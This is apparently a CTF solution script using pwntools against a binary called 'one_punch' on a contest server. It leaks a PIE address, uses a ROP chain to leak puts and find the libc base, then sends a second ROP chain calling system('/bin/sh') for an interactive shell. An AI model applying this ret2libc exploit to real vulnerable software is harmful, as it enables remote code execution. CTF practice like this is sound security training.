from pwn import *
elf = ELF("./one_punch")
libc = ELF("./libc.so.6")
r = elf.process()
#gdb.attach(r, api = True)
r = remote("deadsec.quest",31794)
#bypass PIE
r.recvuntil(b" cape! ")
one_punch = int(r.recvline(),16) - 0x8
elf.address = one_punch - elf.sym["one_punch"]
log.success(f"Base address = {hex(elf.address)}")
#exploit
r.recv()
pop_rdi = elf.address + 0x1291
payload = cyclic(112) + p64(elf.address + 0x139e)
payload += p64(elf.address + 0x101a) + p64(pop_rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(elf.address + 0x13f4)
r.sendline(payload)
print(payload)
libc_leak = u64(r.recv(6).ljust(8, b'\0'))
log.success(f"puts leak: {hex(libc_leak)}")
libc.address = libc_leak - 0x80ed0
log.success(f"LIBC base : {hex(libc.address)}")
payload = cyclic(112) + p64(elf.address + 0x101a) + p64(pop_rdi) + p64(next(libc.search(b"/bin/sh"))) + p64(libc.sym["system"])
r.sendlineafter(b"hero?", payload)
r.interactive()
